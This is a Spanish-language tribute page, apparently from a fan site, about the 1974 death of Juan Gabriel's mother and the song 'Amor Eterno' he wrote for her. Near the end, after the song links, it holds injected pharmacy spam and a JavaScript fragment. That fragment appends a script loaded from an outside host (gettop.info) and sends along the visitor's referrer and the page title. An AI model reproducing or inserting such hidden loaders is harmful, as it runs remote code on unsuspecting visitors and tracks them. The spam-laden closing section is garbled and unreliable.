La muerte de su madre, Doña Victoria Valadez

Comparte !

“La muerte de mi madre es lo que más he lamentado en la vida. En mis noches solitarias, cuando estoy conmigo mismo solamente, me hago muchas preguntas, pero hasta ahí me quedo, porque no puedo encontrar ninguna respuesta que me deje convencido totalmente. Ya pasado el momento de morir, entonces puede uno comprender muchas cosas más, aunque en realidad jamás logre resignarse. Cuando a uno se le muere su mamá, se vuelve sin querer, más rebelde. Después llegan los momentos de resignación, pero uno nunca deja de sentir ese dolor extraño de perder a su mamá.” Juan Gabriel

El 27 de diciembre de 1974 muere su madre, la señora Victoria Valadez; su tumba se encuentra en el panteón municipal de Parácuaro a la entrada del mismo; en esta misma tumba descansan los restos de sus hermanos Miguel Aguilera Valadez y Gabriel Aguilera Valadez.

 

AMOR ETERNO ::.

 Escrita para su madre quien fue el verdadero amor de su vida. A pesar de su abandono, Alberto siempre la disculpo públicamente en cada entrevista que le preguntaban sobre su infancia. La canción fue interpretada por primera vez en 1985 por la española “Rocío Dúrcal”, donde muchos años mas tardes Juan Gabriel logra poder interpretarla ya que era debido a su profunda letra no llegaba a cantarla por el dolor que aun causaba la perdida de su madre.

Amor Eterno, se convirtió en un icono para poder homenajear a las madres en el país de México y en varios países del habla hispana.

“Tu eres el amor del cual yo tengo, el más triste recuerdo de Acapulco”… 27 de diciembre de 1974, en la ciudad de Acapulco, muere Doñá Victoria Valadez Rojas.

 

Juan Gabriel compuso varias canciones que hacen referencia a su madre, te mostramos dos:

Amor Eterno (Ver Letra)

Lágrimas y lluvia (Ver Letra) how much does generic zyprexa cost

 d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares